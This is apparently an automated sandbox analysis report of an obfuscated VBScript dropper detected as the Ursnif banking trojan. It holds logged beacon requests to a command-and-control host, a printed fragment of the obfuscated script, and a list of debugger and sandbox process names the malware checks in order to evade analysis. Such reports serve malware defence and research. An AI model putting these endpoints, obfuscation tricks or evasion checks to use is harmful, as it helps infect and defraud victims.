Analysis Report g1JrwtyGnJZN.vbs

Overview

General Information

Sample Name: g1JrwtyGnJZN.vbs
Analysis ID: 285986
MD5: b4e143c33ff5185caaf368c408a0a478
SHA1: 9765f19b1e7763014c24e3a1481f7e54ec2ff3a2
SHA256: 0cd0d289b0dd3c1db6220a8355e8983f3fc1c0b1a4e235821940d5d4b00903ee

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\mitt.xml Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: g1JrwtyGnJZN.vbs Virustotal: Detection: 14% Perma Link
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/eo3ZSWZV8_2FxYajjF6/fHlrjUKxIkrzJk0PKU41tB/9viqg0M9rFKki/O93z5JnJ/aE25PJZ6HcbryFTSW3W3sQa/aFBMV9j6DK/l16EaOC0MRKNYrw3B/E4v_2FH8pejn/GV7imX1AvF1/MYFUtWbdxOdAq2/xw_2BwtuIrZ1MQqzMU8Bb/uZfwJ8uos0jGz_2F/hNaNpgPpl8Pmilm/vuSJz4SSv_2FQL6RUG/fdMCySM74/xJeXsEj_2FbxfgSe5fIZ/NZZIO5cG3ful2x_2B_2/B_0A_0Dail8I3TU14ZyHLH/RZ5F7bNt3xC_2/BJzzLSuF0QhT/qGaqWpZO_2/B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/UmG5IvP0SycsHKM/ncTup1roRg_2FcqVx_/2FxfMW1eV/eDcK7yxaawWtE7uWmMxP/plka9B_2BSLHhm80wi8/3MuGAu_2B3RB_2FW4vcdbS/iV_2Fbxv1yHbP/fA8OzswY/7wZW8zbmzFAODqXmwu7iNqi/tg8quvSV39/BmQ6Sf12QDk48748t/tbSrZ8J5B13k/VAVFEGivAeY/wpOD7_2FX818Wo/Zq4bAK_2FSitKN5mbXTWV/_2FQMHJ0q7VCD519/uynq39HfJONxPSr/AnR45wQ_0A_0DuRQpL/0y2TKpWn4/4OoIh3WEDc8_2BsZo_2B/bZOoauW3lax_2FeyXqJ/DRbAFcBrKzWW044P7Td_2/B5 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/ohotMIGX9kln_2F5xUI4iT/2bGyyUWD78H6K/n_2B4I6M/7xntC5wUCLe31nX0dCJGF0v/2vCTzrIZHZ/K1STpJpCyA2jBSd7z/E4RhXF8uKsw8/p5H7BeLQSKd/DvcLTJT1DJ9_2F/Zcg88g7SsZiON4oXSHB9V/hwGeNfal1JjWeaiT/uHQK6B3gg9f5zkA/vj_2F7ExNsUJQGzxar/cv9DCbI7b/aWm1IqK7QmWqcZY2YWxj/DzvBfLFJUsfmQgTxF3H/PJCDcGt4uflg_0A_0DX955/nBJdXg6Qra50q/k2tYlz56/T1PkuxZbwwHs8JeDPAGBRe7/7CY_2BeSt0/W_2B_2BZe/dc7XdtN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml0.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x013e9ce8,0x01d68beb</date><accdate>0x013e9ce8,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x013e9ce8,0x01d68beb</date><accdate>0x0140fe0b,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0145c215,0x01d68beb</date><accdate>0x0145c215,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0145c215,0x01d68beb</date><accdate>0x0145c215,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x01482630,0x01d68beb</date><accdate>0x01482630,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x01482630,0x01d68beb</date><accdate>0x01482630,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Sep 2020 20:33:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {45EE70DA-F7DE-11EA-90E3-ECF4BB82F7E0}.dat.26.dr, ~DFDD3758D86AF3E652.TMP.26.dr String found in binary or memory: http://api10.laptok.at/api1/UmG5IvP0SycsHKM/ncTup1roRg_2FcqVx_/2FxfMW1eV/eDcK7yxaawWtE7uWmMxP/plka9B
Source: {2B684CD2-F7DE-11EA-90E3-ECF4BB82F7E0}.dat.20.dr String found in binary or memory: http://api10.laptok.at/api1/eo3ZSWZV8_2FxYajjF6/fHlrjUKxIkrzJk0PKU41tB/9viqg0M9rFKki/O93z5JnJ/aE25PJ
Source: msapplication.xml.20.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.20.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.20.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.20.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.20.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.20.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.20.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.20.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.374917949.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374965173.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375131455.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375076208.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375019084.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375052638.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375106065.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374881128.0000000005F18000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.374917949.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374965173.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375131455.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375076208.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375019084.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375052638.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375106065.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374881128.0000000005F18000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Java / VBScript file with very long strings (likely obfuscated code)
Source: g1JrwtyGnJZN.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/40@3/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user~1\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\g1JrwtyGnJZN.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: g1JrwtyGnJZN.vbs Virustotal: Detection: 14%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\g1JrwtyGnJZN.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7036 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3920 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7036 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3920 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync Jump to behavior
Source: g1JrwtyGnJZN.vbs Static file information: File size 1343211 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: c:\12\fill\55\Port\Hair\ice\61\Art\4\6\13\may\84\Boat\2\West.pdb source: mitt.xml.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(174306601)) > 0 And Kruger = 0) ThenExit FunctionEnd Iffilmmake = ((99 + 90.0) - (78 + (213 - 105.0)))' art Catherine probationary. warden397 Gustavus crusade magnet monolith81 encroach deoxyribonucleic potpourri IR731, guild. fictive erect67 mammary Oedipus955 digress ornamentation alpaca, 3149952 comptroller baste366. 4124438 telekinesis570 Plato Watson Ogden courage broaden368 kid Allah facetious Crawford Hartley691 Britten, tripod perfect freehold635 rennet. 788855 systematic. 3587675 plural amide probosces accumulate110. 1365465 classify283 chromatin. fiesta droop vinyl471 lint107 knurl Cyril chamberlain sex378 ivy northernmost abjure greylag762, tate hamper linseed rho. Ethiopia893. rim Moulton leech ovipositor apotheosis106 greengrocer gluey fulsome deceptive scientific promulgate Atropos hungry sag pyknotic461 indices295 eastward disjunct816, Fontainebleau demi commit deodorant bogy swain rickshaw stormbound238 innumerable glorious purgatory silt Darius filmmake_download = (65 + (-(63 - ((78 + (-38.0)) + (-39.0)))))If CreateObject("Scripting.FileSystemObject").GetFolder(triode).Files.Count < filmmake ThenREM accelerometer Andromache firemen errata peppy grateful rail proboscis alpaca48 Valparaiso fragment singable Gorham Rowe901 citizenry isopleth sexual crepe699 Mullen851 esplanade mansion insouciant locomotive theyre631 intimate tycoon, thimbleful coincident seedbed Sci dietary895 lick radiography meat Aries sentinel Atropos12 frazzle351, April legato. 4003764 pillage Reginald pontific, pacifist bogus medicinal742 senior684, 2072838 thousand, 989632 swatch Bradford embassy leftmost bane barbarism betony liar166 bongo grab autoclave Frenchmen sparrow catchup192 Jonas shalom88 bedimming8 formic Islamabad802 jackboot. 2354640 big semblance Pliny583. newscast786, 2906167 Fleming. curious leachate barn609 prexy healthful boa larkspur Pentecost magnetic, Hetman inequitable ranch woodcarver ninth202 peregrine748 crevice bettor856 botulism526 Segundo convulsion convince Roosevelt McGowan stamen McNally EiRhJIUREM plank miscellaneous Rutland McKinney410 vacuous eightieth presto Doherty medley nirvana littoral cornerstone beak emerge airplane Casanova squamous bite blackmail abutted coast stairway centrifugate582 bruit. clitoris promote gaze humus congruent275. PhD Alger Nostrand dentition Dowling eruption business, mantle CRT616 had odious lea sheaf snippy madam delight. 6703318 clothe actual, becalm rhyme merge. David acrobatic Fischer365 colic inflect jittery fife chuckle sally primrose mustard daffodil ONeill casserole bristlecone irrevocable formal vinaigrette Watkins fed CRT855 pantheon mortify. 189420 ford electrocardiogram McKenzie woke embargo fillet Elysee lavatory bag coextensive344 ridicule patron MacMahon855, AR693 gavotte spheroid matriarchy Goff immerse. heir bazaar274 Armata traversal protege snick End IfSet Castillo213 = CreateObject("WScript.Shell")patroness877 = Castillo213.ExpandEnvironment

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\mitt.xml Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\mitt.xml Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.374917949.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374965173.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375131455.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375076208.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375019084.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375052638.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375106065.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374881128.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\g1jrwtygnjzn.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: EMUL.EXEE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXEONE@
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXEP
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXEN
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXEH
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXEH
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mitt.xml Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6624 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: mitt.xml.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
